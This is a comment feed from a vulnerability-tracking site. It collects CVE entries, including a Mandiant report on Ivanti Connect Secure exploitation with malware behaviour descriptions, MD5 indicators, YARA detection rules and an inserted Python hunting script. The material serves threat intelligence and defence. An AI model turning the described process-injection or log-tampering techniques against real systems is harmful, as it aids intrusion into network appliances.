Recent comments



PoC for CVE-2025-22457 on cve-2025-22457
5 days ago by Alexandre Dulaunoy

PoC for CVE-2025-22457

A remote unauthenticated stack based buffer overflow affecting Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways

Overview

This is a proof of concept exploit to demonstrate exploitation of CVE-2025-22457. For a complete technical analysis of the vulnerability and exploitation strategy, please see our Rapid7 Analysis here:

https://attackerkb.com/topics/0ybGQIkHzR/cve-2025-22457/rapid7-analysis

Available at https://github.com/sfewer-r7/CVE-2025-22457


Tags: vulnerability:exploitability=industrialised, vulnerability:information=PoC


Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457) on cve-2025-22457
5 days ago by Alexandre Dulaunoy

Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457) | Google Cloud Blog

Written by: John Wolfram, Michael Edie, Jacob Thompson, Matt Lin, Josh Murchie


On Thursday, April 3, 2025, Ivanti disclosed a critical security vulnerability, CVE-2025-22457, impacting Ivanti Connect Secure (“ICS”) VPN appliances version 22.7R2.5 and earlier. CVE-2025-22457 is a buffer overflow vulnerability, and successful exploitation would result in remote code execution. Mandiant and Ivanti have identified evidence of active exploitation in the wild against ICS 9.X (end of life) and 22.7R2.5 and earlier versions. Ivanti and Mandiant encourage all customers to upgrade as soon as possible. 

The earliest evidence of observed CVE-2025-22457 exploitation occurred in mid-March 2025. Following successful exploitation, we observed the deployment of two newly identified malware families, the TRAILBLAZE in-memory only dropper and the BRUSHFIRE passive backdoor. Additionally, deployment of the previously reported SPAWN ecosystem of malware attributed to UNC5221 was also observed. UNC5221 is a suspected China-nexus espionage actor that we previously observed conducting zero-day exploitation of edge devices dating back to 2023.

A patch for CVE-2025-22457 was released in ICS 22.7R2.6 on February 11, 2025. The vulnerability is a buffer overflow with a limited character space, and therefore it was initially believed to be a low-risk denial-of-service vulnerability. We assess it is likely the threat actor studied the patch for the vulnerability in ICS 22.7R2.6 and uncovered, through a complicated process, that it was possible to exploit 22.7R2.5 and earlier to achieve remote code execution.

Ivanti released patches for the exploited vulnerability and Ivanti customers are urged to follow the actions in the Security Advisory to secure their systems as soon as possible.

Post-Exploitation Tactics, Techniques, and Procedures

Following successful exploitation, Mandiant observed the deployment of two newly identified malware families tracked as TRAILBLAZE and BRUSHFIRE through a shell script dropper. Mandiant has also observed the deployment of the SPAWN ecosystem of malware. Additionally, similar to previously observed behavior, the actor attempted to modify the Integrity Checker Tool (ICT) in an attempt to evade detection.  

Shell-script Dropper

Following successful exploitation of CVE-2025-22457, Mandiant observed a shell script being leveraged that executes the TRAILBLAZE dropper. This dropper injects the BRUSHFIRE passive backdoor into a running /home/bin/web process. The first stage begins by searching for a /home/bin/web process that is a child process of another /home/bin/web process (the point of this appears to be to inject into the web process that is actually listening for connections). It then creates the following files and associated content:

  • /tmp/.p: contains the PID of the /home/bin/web process.

  • /tmp/.m: contains a memory map of that process (human-readable).

  • /tmp/.w: contains the base address of the web binary from that process

  • /tmp/.s: contains the base address of libssl.so from that process

  • /tmp/.r: contains the BRUSHFIRE passive backdoor

  • /tmp/.i: contains the TRAILBLAZE dropper

The shell script then executes /tmp/.i, which is the second stage in-memory only dropper tracked as TRAILBLAZE. It then deletes all of the temporary files previously created (except for /tmp/.p), as well as the contents of the /data/var/cores directory. Next, all child processes of the /home/bin/web process are killed and the /tmp/.p file is deleted. All of this behavior is non-persistent, and the dropper will need to be re-executed if the system or process is rebooted.

TRAILBLAZE

TRAILBLAZE is an in-memory only dropper written in bare C that uses raw syscalls and is designed to be as minimal as possible, likely to ensure it can fit within the shell script as Base64. TRAILBLAZE injects a hook into the identified /home/bin/web process. It will then inject the BRUSHFIRE passive backdoor into a code cave inside that process.

BRUSHFIRE

BRUSHFIRE is a passive backdoor written in bare C that acts as an SSL_read hook. It first executes the original SSL_read function, and checks to see if the returned data begins with a specific string. If the data begins with the string, it will XOR decrypt then execute shellcode contained in the data. If the received shellcode returns a value, the backdoor will call SSL_write to send the value back.

SPAWNSLOTH

As detailed in our previous blog post, SPAWNSLOTH acts as a log tampering component tied to the SPAWNSNAIL backdoor. It targets the dslogserver process to disable both local logging and remote syslog forwarding.

SPAWNSNARE

SPAWNSNARE is a utility that is written in C and targets Linux. It can be used to extract the uncompressed Linux kernel image (vmlinux) into a file and encrypt it using AES without the need for any command line tools.

SPAWNWAVE

SPAWNWAVE is an evolved version of SPAWNANT that combines capabilities from other members of the SPAWN* malware ecosystem. SPAWNWAVE overlaps with the publicly reported SPAWNCHIMERA and RESURGE malware families.

Attribution

Google Threat Intelligence Group (GTIG) attributes the exploitation of CVE-2025-22457 and the subsequent deployment of the SPAWN ecosystem of malware to the suspected China-nexus espionage actor UNC5221. GTIG has previously reported UNC5221 conducting zero-day exploitation of CVE-2025-0282, as well as the exploitation of CVE-2023-46805 and CVE-2024-21887.

Furthermore, GTIG has also previously observed UNC5221 conducting zero-day exploitation of CVE-2023-4966, impacting NetScaler ADC and NetScaler Gateway appliances. UNC5221 has targeted a wide range of countries and verticals during their operations, and has leveraged an extensive set of tooling, spanning passive backdoors to trojanized legitimate components on various edge appliances. 

GTIG assesses that UNC5221 will continue pursuing zero-day exploitation of edge devices based on their consistent history of success and aggressive operational tempo. Additionally, as noted in our prior blog post detailing CVE-2025-0282 exploitation, GTIG has observed UNC5221 leveraging an obfuscation network of compromised Cyberoam appliances, QNAP devices, and ASUS routers to mask their true source during intrusion operations.

Conclusion

This latest activity from UNC5221 underscores the ongoing sophisticated threats targeting edge devices globally. This campaign, exploiting the n-day vulnerability CVE-2025-22457, also highlights the persistent focus of actors like UNC5221 on edge devices, leveraging deep device knowledge and adding to their history of using both zero-day and now n-day flaws. This activity aligns with the broader strategy GTIG has observed among suspected China-nexus espionage groups who invest significantly in exploits and custom malware for critical edge infrastructure.

Recommendations 

Mandiant recommends organizations immediately apply the available patch by upgrading Ivanti Connect Secure (ICS) appliances to version 22.7R2.6 or later to address CVE-2025-22457. Additionally, organizations should use the external and internal Integrity Checker Tool (“ICT”) and contact Ivanti Support if suspicious activity is identified. To supplement this, defenders should actively monitor for core dumps related to the web process, investigate ICT statedump files, and conduct anomaly detection of client TLS certificates presented to the appliance.

Acknowledgements

We would like to thank Daniel Spicer and the rest of the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE; we would like to specifically thank Christopher Gardner and Dhanesh Kizhakkinan of FLARE for their support.

Indicators of Compromise

To assist the security community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.

Code Family   MD5                               Filename               Description
TRAILBLAZE    4628a501088c31f53b5c9ddf6788e835  /tmp/.i                In-memory dropper
BRUSHFIRE     e5192258c27e712c7acf80303e68980b  /tmp/.r                Passive backdoor
SPAWNSNARE    6e01ef1367ea81994578526b3bd331d6  /bin/dsmain            Kernel extractor & encryptor
SPAWNWAVE     ce2b6a554ae46b5eb7d79ca5e7f440da  /lib/libdsupgrade.so   Implant utility
SPAWNSLOTH    10659b392e7f5b30b375b94cae4fdca0  /tmp/.liblogblock.so   Log tampering utility
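As an added example (not code from the original post or from Mandiant), the following Python hunts for the artifacts described in the Shell-script Dropper section and matches file hashes against the IOC table above: it finds the injection target (a /home/bin/web process whose parent is also /home/bin/web), flags the /tmp dotfiles, checks that /tmp/.p names that worker, and compares a hash listing with the published MD5s. The process listing, /tmp snapshot and hash listing are constructed sample data, and the function names are assumptions.

```python
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

WEB = "/home/bin/web"

# Filenames and MD5s exactly as published in the post's IOC table.
IOC_MD5: Dict[str, Tuple[str, str]] = {
    "/tmp/.i": ("TRAILBLAZE", "4628a501088c31f53b5c9ddf6788e835"),
    "/tmp/.r": ("BRUSHFIRE", "e5192258c27e712c7acf80303e68980b"),
    "/bin/dsmain": ("SPAWNSNARE", "6e01ef1367ea81994578526b3bd331d6"),
    "/lib/libdsupgrade.so": ("SPAWNWAVE", "ce2b6a554ae46b5eb7d79ca5e7f440da"),
    "/tmp/.liblogblock.so": ("SPAWNSLOTH", "10659b392e7f5b30b375b94cae4fdca0"),
}

# Temporary files the shell-script dropper writes before executing /tmp/.i.
DROPPER_TMP_FILES = ("/tmp/.p", "/tmp/.m", "/tmp/.w", "/tmp/.s", "/tmp/.r", "/tmp/.i")


@dataclass(frozen=True)
class Proc:
    """One row of a process listing (e.g. from ps -eo pid,ppid,exe)."""
    pid: int
    ppid: int
    exe: str


def injection_targets(procs: Iterable[Proc]) -> List[int]:
    """PIDs of /home/bin/web processes whose parent is also /home/bin/web.

    This is the process the dropper selects (the worker that actually
    listens for connections), so it is where BRUSHFIRE would be injected.
    """
    procs = list(procs)
    by_pid = {p.pid: p for p in procs}
    return sorted(
        p.pid for p in procs
        if p.exe == WEB and p.ppid in by_pid and by_pid[p.ppid].exe == WEB
    )


def hunt(procs: Iterable[Proc],
         tmp_files: Dict[str, bytes],
         hashes: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (finding_kind, detail) pairs for a host snapshot.

    tmp_files maps a path to its raw content; hashes maps a path to its MD5
    (as produced by a separate hash listing of the appliance filesystem).
    """
    findings: List[Tuple[str, str]] = []
    targets = set(injection_targets(procs))

    # Any of the dropper's dotfiles in /tmp is worth a look on its own.
    for path in DROPPER_TMP_FILES:
        if path in tmp_files:
            findings.append(("dropper_tmp_file", path))

    # /tmp/.p survives longest; it should hold the PID of the injected worker.
    pid_blob = tmp_files.get("/tmp/.p")
    if pid_blob is not None:
        text = pid_blob.decode("ascii", "replace").strip()
        if text.isdigit() and int(text) in targets:
            findings.append(("pid_file_names_web_worker", text))
        else:
            findings.append(("pid_file_unexpected_content", text))

    # Hash matches against the published IOC table.
    for path, (family, md5) in IOC_MD5.items():
        if hashes.get(path, "").lower() == md5:
            findings.append(("ioc_hash_match", f"{family}:{path}"))
    return findings


# Constructed sample data: a parent web process with one worker child, a
# snapshot taken after TRAILBLAZE ran but before the final cleanup (only
# /tmp/.p left), and a hash listing in which /tmp/.r carries the published
# BRUSHFIRE MD5.
SAMPLE_PROCS = [
    Proc(1, 0, "/sbin/init"),
    Proc(1200, 1, WEB),          # parent web process
    Proc(1234, 1200, WEB),       # listening worker: the injection target
    Proc(1300, 1, "/home/bin/dslogserver"),
]
SAMPLE_TMP = {"/tmp/.p": b"1234\n"}
SAMPLE_HASHES = {"/tmp/.r": "e5192258c27e712c7acf80303e68980b"}

if __name__ == "__main__":
    for kind, detail in hunt(SAMPLE_PROCS, SAMPLE_TMP, SAMPLE_HASHES):
        print(f"{kind}: {detail}")
```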

YARA Rules

// 0x464c457f is the little-endian ELF magic ("\x7fELF"), so each rule
// only fires on ELF binaries.
rule M_APT_Installer_SPAWNANT_1
{
    meta:
        author = "Mandiant"
        description = "Detects SPAWNANT. SPAWNANT is an installer targeting Ivanti devices. Its purpose is to persistently install other malware from the SPAWN family (SPAWNSNAIL, SPAWNMOLE) as well as drop additional webshells on the box."

    strings:
        $s1 = "dspkginstall" ascii fullword
        $s2 = "vsnprintf" ascii fullword
        $s3 = "bom_files" ascii fullword
        $s4 = "do-install" ascii
        $s5 = "ld.so.preload" ascii
        $s6 = "LD_PRELOAD" ascii
        $s7 = "scanner.py" ascii

    condition:
        uint32(0) == 0x464c457f and 5 of ($s*)
}

rule M_Utility_SPAWNSNARE_1
{
    meta:
        author = "Mandiant"
        description = "SPAWNSNARE is a utility written in C that targets Linux systems by extracting the uncompressed Linux kernel image into a file and encrypting it with AES."

    strings:
        $s1 = "\x00extract_vmlinux\x00"
        $s2 = "\x00encrypt_file\x00"
        $s3 = "\x00decrypt_file\x00"
        $s4 = "\x00lbb_main\x00"
        $s5 = "\x00busybox\x00"
        $s6 = "\x00/etc/busybox.conf\x00"

    condition:
        uint32(0) == 0x464c457f and all of them
}

rule M_APT_Utility_SPAWNSLOTH_2
{
    meta:
        author = "Mandiant"
        description = "Hunting rule to identify strings found in SPAWNSLOTH"

    strings:
        $dslog = "dslogserver" ascii fullword
        $hook1 = "g_do_syslog_servers_exist" ascii fullword
        $hook2 = "ZN5DSLog4File3addEPKci" ascii fullword
        $hook3 = "funchook" ascii fullword

    condition:
        uint32(0) == 0x464c457f and all of them
}

Posted in: Threat Intelligence


Links referenced in the original post:

  • Ivanti April Security Advisory (CVE-2025-22457): https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457

  • Ivanti patches: https://portal.ivanti.com/

  • SPAWN ecosystem of malware (prior Mandiant post): https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement

  • Prior investigation of Ivanti zero-day exploitation: https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation/

  • SPAWNCHIMERA (JPCERT/CC): https://blogs.jpcert.or.jp/en/2025/02/spawnchimera.html

  • RESURGE (CISA AR25-087A): https://www.cisa.gov/news-events/analysis-reports/ar25-087a

  • GTI Collection of IOCs: https://www.virustotal.com/gui/collection/c1437b752a4bece143f3584eef40b00cb72f9281068bd1c235cf76f94d744024/iocs

Related vulnerabilities: CVE-2025-0282, CVE-2025-22457, CVE-2024-21887, CVE-2023-4966, CVE-2023-46805

Tags: vulnerability:origin=software


Is The Sofistication In The Room With Us? - X-Forwarded-For and Ivanti Connect Secure on cve-2025-22457
10 days ago by Alexandre Dulaunoy


Is The Sofistication In The Room With Us? - X-Forwarded-For and Ivanti Connect Secure (watchTowr Labs): https://labs.watchtowr.com/is-the-sofistication-in-the-room-with-us-x-forwarded-for-and-ivanti-connect-secure-cve-2025-22457/

Tags: vulnerability:exploitability=documented


Apple fixes WebKit zero-day exploited in ‘extremely sophisticated’ attacks on cve-2025-24201
1 month ago by Cédric Bonhomme

Apple has released emergency security updates to patch a zero-day bug the company describes as exploited in "extremely sophisticated" attacks.

The vulnerability is tracked as CVE-2025-24201 and was found in the WebKit cross-platform web browser engine used by Apple's Safari web browser and many other apps and web browsers on macOS, iOS, Linux, and Windows.


Reference: https://www.bleepingcomputer.com/news/apple/apple-fixes-webkit-zero-day-exploited-in-extremely-sophisticated-attacks/


Apache Pinot Improper Neutralization of Special Elements Authentication Bypass Vulnerability on cve-2024-56325
1 month ago by Alexandre Dulaunoy

CVE ID: CVE-2024-56325
CVSS SCORE: 9.8, AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AFFECTED VENDORS: Apache
AFFECTED PRODUCTS: Pinot

VULNERABILITY DETAILS
This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.

ADDITIONAL DETAILS
Fixed in version 1.3.0


Tags: vulnerability:information=remediation


PolarEdge Botnet Exploits Cisco and Other Flaws to Hijack ASUS, QNAP, and Synology Devices on cve-2023-20118
1 month ago by Cédric Bonhomme

French cybersecurity company Sekoia observed the unknown threat actors deploying a backdoor by leveraging CVE-2023-20118 (CVSS score: 6.5), a critical security flaw impacting Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers that could result in arbitrary command execution on susceptible devices.

CVE-2023-20118 is leading to a webshell installation.


References:

  • https://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/

  • https://securityscorecard.com/wp-content/uploads/2025/02/MassiveBotnet-Report_022125_03.pdf


Formal Vulnerability Disclosure for iPhone 15 Pro Max (iOS 18.3.1) on cve-2025-24085
1 month ago by Cédric Bonhomme

Executive Summary

This report updates the findings on CVE-2025-24085, a use-after-free vulnerability affecting Apple's IDS subsystem and iMessage's BlastDoor sandboxing.

Findings (as of February 20, 2025)

  • iOS 18.3.1 remains vulnerable despite Apple's February 19, 2025, mitigation deadline.

  • BlastDoor is bypassed, enabling unsandboxed iMessage processing.

  • Privilege escalation attempts detected, suggesting a possible kernel exploit.

  • Unauthorized decryption and authentication tampering observed, raising concerns about iMessage interception and data exposure.

The exploit remains active in the wild, requiring immediate action.

https://github.com/orgs/community/discussions/152523


{
   uuid: "e2a22b2f-4064-4f7f-a7c5-6b9f4b3cd280",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Formal Vulnerability Disclosure for iPhone 15 Pro Max (iOS 18.3.1)",
   description: "### Executive Summary\n\nThis report updates the findings on CVE-2025-24085, a use-after-free vulnerability affecting Apple's IDS subsystem and iMessage's BlastDoor sandboxing.\nFindings (As of February 20, 2025)\n\n    iOS 18.3.1 remains vulnerable despite Apple's February 19, 2025, mitigation deadline.\n    BlastDoor is bypassed, enabling unsandboxed iMessage processing.\n    Privilege escalation attempts detected, suggesting a possible kernel exploit.\n    Unauthorized decryption and authentication tampering observed, raising concerns about iMessage interception and data exposure.\n\nThe exploit remains active in the wild, requiring immediate action.\n\nhttps://github.com/orgs/community/discussions/152523",
   description_format: "markdown",
   vulnerability: "CVE-2025-24085",
   creation_timestamp: "2025-02-27T08:00:55.964879+00:00",
   timestamp: "2025-02-27T08:00:55.964879+00:00",
   related_vulnerabilities: [
      "CVE-2025-24085",
   ],
   meta: [
      {
         ref: [
            "https://github.com/orgs/community/discussions/152523",
         ],
      },
   ],
}

cve-2025-24085

2025-02: Out-of-Cycle Security Bulletin: Session Smart Router, Session Smart Conductor, WAN Assurance Router: API Authentication Bypass Vulnerability (CVE-2025-21589) on ncsc-2025-0062
1 month ago by Alexandre Dulaunoy

This issue affects Session Smart Router, Session Smart Conductor, WAN Assurance Managed Router.

Severity: Critical

Severity Assessment (CVSS) Score

CVSS: v3.1: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) SEVERITY:CRITICAL
CVSS: v4.0: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N) SEVERITY:CRITICAL

Problem

An Authentication Bypass Using an Alternate Path or Channel vulnerability in Juniper Networks Session Smart Router may allow a network-based attacker to bypass authentication and take administrative control of the device.

This issue affects Session Smart Router:

from 5.6.7 before 5.6.17, 
from 6.0.8,
from 6.1 before 6.1.12-lts, 
from 6.2 before 6.2.8-lts, 
from 6.3 before 6.3.3-r2; 

This issue affects Session Smart Conductor:

from 5.6.7 before 5.6.17, 
from 6.0.8,
from 6.1 before 6.1.12-lts, 
from 6.2 before 6.2.8-lts, 
from 6.3 before 6.3.3-r2; 

This issue affects WAN Assurance Managed Routers:

from 5.6.7 before 5.6.17, 
from 6.0.8,
from 6.1 before 6.1.12-lts, 
from 6.2 before 6.2.8-lts, 
from 6.3 before 6.3.3-r2.

Juniper SIRT is not aware of any malicious exploitation of this vulnerability. This issue was found during internal product security testing or research.

Solution

The following software releases have been updated to resolve this issue:

Session Smart Router: SSR-5.6.17, SSR-6.1.12-lts, SSR-6.2.8-lts, SSR-6.3.3-r2 and subsequent releases.

It is suggested to upgrade all affected systems to one of these versions of software. In a Conductor-managed deployment, it is sufficient to upgrade only the Conductor nodes and the fix will be applied automatically to all connected routers. As practical, the routers should still be upgraded to a fixed version; however, they will not be vulnerable once they connect to an upgraded Conductor. Router patching can be confirmed once the router reaches the “running” (on 6.2 and earlier) or “synchronized” (on 6.3+) state on the Conductor.

This vulnerability has been patched automatically on devices that operate with WAN Assurance (where configuration is also managed) connected to the Mist Cloud. As practical, the routers should still be upgraded to a version containing the fix.

It is important to note that when the fix is applied automatically on routers managed by a Conductor or on WAN assurance, it will have no impact on data-plane functions of the router. The application of the fix is non-disruptive to production traffic. There may be a momentary downtime (less than 30 seconds) to the web-based management and APIs.

This issue is being tracked as I95-59677.

Note: Juniper SIRT's policy is not to evaluate releases which are beyond End of Engineering (EOE) or End of Life (EOL).

Workaround

There are no known workarounds for this issue.

Severity Assessment

Information for how Juniper Networks uses CVSS can be found at KB 16446 "Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories."

Modification History

2024-02-11: Initial Publication

Related Information

KB16613: Overview of the Juniper Networks SIRT Quarterly Security Bulletin Publication Process
KB16765: In which releases are vulnerabilities fixed?
KB16446: Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories
Report a Security Vulnerability - How to Contact the Juniper Networks Security Incident Response Team


{
   uuid: "b45703d4-11a4-4f18-a2f4-8929ea2f08d2",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "2025-02: Out-of-Cycle Security Bulletin: Session Smart Router, Session Smart Conductor, WAN Assurance Router: API Authentication Bypass Vulnerability (CVE-2025-21589)",
   description: "This issue affects Session Smart Router, Session Smart Conductor, WAN Assurance Managed Router.\nSeverity\nCritical\nSeverity Assessment (CVSS) Score\n\nCVSS: v3.1: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) SEVERITY:CRITICAL\nCVSS: v4.0: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N) SEVERITY:CRITICAL\nProblem\n\nAn Authentication Bypass Using an Alternate Path or Channel vulnerability in Juniper Networks Session Smart Router may allow a network-based attacker to bypass authentication and take administrative control of the device.\n\n \n\nThis issue affects Session Smart Router: \n\n    from 5.6.7 before 5.6.17, \n    from 6.0.8,\n    from 6.1 before 6.1.12-lts, \n    from 6.2 before 6.2.8-lts, \n    from 6.3 before 6.3.3-r2; \n\nThis issue affects Session Smart Conductor: \n\n    from 5.6.7 before 5.6.17, \n    from 6.0.8,\n    from 6.1 before 6.1.12-lts, \n    from 6.2 before 6.2.8-lts, \n    from 6.3 before 6.3.3-r2; \n\nThis issue affects WAN Assurance Managed Routers: \n\n    from 5.6.7 before 5.6.17, \n    from 6.0.8,\n    from 6.1 before 6.1.12-lts, \n    from 6.2 before 6.2.8-lts, \n    from 6.3 before 6.3.3-r2.\n\n \n\nJuniper SIRT is not aware of any malicious exploitation of this vulnerability.\nThis issue was found during internal product security testing or research\nSolution\n\nThe following software releases have been updated to resolve this issue:\n\n\nSession Smart Router: SSR-5.6.17, SSR-6.1.12-lts, SSR-6.2.8-lts, SSR-6.3.3-r2 and subsequent releases.\n\n\nIt is suggested to upgrade all affected systems to one of these versions of software. In a Conductor-managed deployment, it is sufficient to upgrade only the Conductor nodes and the fix will be applied automatically to all connected routers. As practical, the routers should still be upgraded to a fixed version however they will not be vulnerable once they connect to an upgraded Conductor. Router patching can be confirmed once the router reaches the “running\" (on 6.2 and earlier) or “synchronized” (on 6.3+) state on the Conductor\".\n \n\nThis vulnerability has been patched automatically on devices that operate with WAN Assurance (where configuration is also managed) connected to the Mist Cloud. As practical, the routers should still be upgraded to a version containing the fix.\n\nIt is important to note that when the fix is applied automatically on routers managed by a Conductor or on WAN assurance, it will have no impact on data-plane functions of the router. The application of the fix is non-disruptive to production traffic. There may be a momentary downtime (less than 30 seconds) to the web-based management and APIs. \n\n \n\nThis issue is being tracked as I95-59677.\n\nNote: Juniper SIRT's policy is not to evaluate releases which are beyond End of Engineering (EOE) or End of Life (EOL).\nWorkaround\n\nThere are no known workarounds for this issue.\nSeverity Assessment\nInformation for how Juniper Networks uses CVSS can be found at KB 16446 \"Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories.\"\nModification History\n\n2024-02-11: Initial Publication\n\nRelated Information\n\n    KB16613: Overview of the Juniper Networks SIRT Quarterly Security Bulletin Publication Process\n    KB16765: In which releases are vulnerabilities fixed?\n    KB16446: Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories\n    Report a Security Vulnerability - How to Contact the Juniper Networks Security Incident Response Team\n\n",
   description_format: "markdown",
   vulnerability: "ncsc-2025-0062",
   creation_timestamp: "2025-02-19T16:52:08.947558+00:00",
   timestamp: "2025-02-19T16:52:08.947558+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
   ],
}

ncsc-2025-0062

Palantir - Security Bulletin - CVE-2024-49581 - Palantir’s External Artifacts service (versions 105.110.1 through 105.115.0) on cve-2024-49587
1 month ago by Cédric Bonhomme

Restricted Views backed objects (OSV1) could be bypassed under specific circumstances due to a software bug; this could have allowed users that didn't have permission to see such objects to view them via Object Explorer directly. The affected service has been patched and automatically deployed to all Apollo-managed Foundry instances.


{
   uuid: "6b5acef0-e6ed-4fe9-9181-33b50f601ae5",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Palantir - Security Bulletin - CVE-2024-49581 - Palantir’s External Artifacts service (versions 105.110.1 through 105.115.0)",
   description: "Restricted Views backed objects (OSV1) could be bypassed under specific circumstances due to a software bug, this could have allowed users that didn't have permission to see such objects to view them via Object Explorer directly.  The affected service have been patched and automatically deployed to all Apollo-managed Foundry instances.",
   description_format: "markdown",
   vulnerability: "CVE-2024-49587",
   creation_timestamp: "2025-02-18T21:41:17.332565+00:00",
   timestamp: "2025-02-18T21:41:17.332565+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         ref: [
            "https://palantir.safebase.us/?tcuUid=b60db1ee-4b1a-475d-848e-c5a670a0da16",
         ],
      },
   ],
}

cve-2024-49587

SonicWall Firewall Vulnerability Exploited After PoC Publication on cve-2024-53704
1 month ago by Cédric Bonhomme

Threat actors started exploiting a recent SonicWall firewall vulnerability this week, shortly after proof-of-concept (PoC) code targeting it was published.

According to Bishop Fox, approximately 4,500 internet-facing SonicWall SSL VPN servers had not been patched against CVE-2024-53704 by February 7.


{
   uuid: "b2a6b85e-5b0d-4ac4-b7a4-9227e3ff28e0",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "SonicWall Firewall Vulnerability Exploited After PoC Publication",
   description: "Threat actors started exploiting a recent SonicWall firewall vulnerability this week, shortly after proof-of-concept (PoC) code targeting it was published.\n\nAccording to Bishop Fox, approximately 4,500 internet-facing SonicWall SSL VPN servers had not been patched against CVE-2024-53704 by February 7.",
   description_format: "markdown",
   vulnerability: "CVE-2024-53704",
   creation_timestamp: "2025-02-17T08:57:05.680592+00:00",
   timestamp: "2025-02-17T08:57:05.680592+00:00",
   related_vulnerabilities: [
      "CVE-2024-53704",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
      {
         ref: [
            "https://www.securityweek.com/sonicwall-firewall-vulnerability-exploited-after-poc-publication",
            "https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking",
         ],
      },
   ],
}

cve-2024-53704

securityonline.info - Chrome Update Addresses High-Severity Vulnerability: CVE-2025-0291 on cve-2025-0291
2 months ago by Alexandre Dulaunoy

Chrome Update Addresses High-Severity Vulnerability: CVE-2025-0291

Ref: https://securityonline.info/chrome-update-addresses-high-severity-vulnerability-cve-2025-0291/

Google has just released a critical security update for its Chrome web browser, addressing a high-severity vulnerability that could leave users open to attack. The update, rolling out to Windows, Mac, and Linux users over the next few days, patches a “Type Confusion” flaw in V8, the JavaScript engine that powers Chrome.

This vulnerability, tracked as CVE-2025-0291, was discovered by security researcher Popax21 and reported to Google on December 11th, 2024. Type Confusion vulnerabilities are particularly dangerous as they can allow attackers to execute malicious code on a user’s system. This can lead to a range of consequences, from data theft and system crashes to complete takeover of the affected device. Google has awarded a bounty of $55,000 to Popax21 for the discovery and responsible disclosure of the bug.

Type Confusion vulnerabilities occur when a program mistakenly treats data as a different type than originally intended. In the context of V8, this can lead to out-of-bounds memory access, allowing attackers to manipulate memory, crash the browser, or execute arbitrary code. Such vulnerabilities are often exploited in sophisticated attacks, making their timely resolution critical for user safety.

Google urges all users to update their Chrome browsers to the latest version (131.0.6778.264/.265 for Windows and Mac, 131.0.6778.264 for Linux) as soon as possible. Here’s how:

  1. Open Chrome.
  2. Click the three vertical dots in the top right corner.
  3. Go to Help > About Google Chrome.
  4. Chrome will automatically check for updates and install the latest version.
  5. Relaunch Chrome to complete the update.


{
   uuid: "83590ea9-dd4d-4b41-a332-1519809ad219",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "securityonline.info - Chrome Update Addresses High-Severity Vulnerability: CVE-2025-0291",
   description: "# Chrome Update Addresses High-Severity Vulnerability: CVE-2025-0291\n\nRef: [https://securityonline.info/chrome-update-addresses-high-severity-vulnerability-cve-2025-0291/](https://securityonline.info/chrome-update-addresses-high-severity-vulnerability-cve-2025-0291/)\n\n<img src=\"https://cdn-0.securityonline.info/wp-content/uploads/2025/01/Screenshot-2025-01-08-082901.png\" width=\"100%\" />\n\nGoogle has just released a critical security update for its Chrome web browser, addressing a high-severity vulnerability that could leave users open to attack. The update, rolling out to Windows, Mac, and Linux users over the next few days, patches a “Type Confusion” flaw in V8, the JavaScript engine that powers Chrome.\n\nThis vulnerability, tracked as CVE-2025-0291, was discovered by security researcher Popax21 and reported to Google on December 11th, 2024. Type Confusion vulnerabilities are particularly dangerous as they can allow attackers to execute malicious code on a user’s system. This can lead to a range of consequences, from data theft and system crashes to complete takeover of the affected device. Google has awarded a bounty of $55,000 to Popax21 for the discovery and responsible disclosure of the bug.\n\nType Confusion vulnerabilities occur when a program mistakenly treats data as a different type than originally intended. In the context of V8, this can lead to out-of-bounds memory access, allowing attackers to manipulate memory, crash the browser, or execute arbitrary code. Such vulnerabilities are often exploited in sophisticated attacks, making their timely resolution critical for user safety.\n\nGoogle urges all users to update their Chrome browsers to the latest version (131.0.6778.264/.265 for Windows and Mac, 131.0.6778.264 for Linux) as soon as possible. Here’s how:\n\n1.  **Open 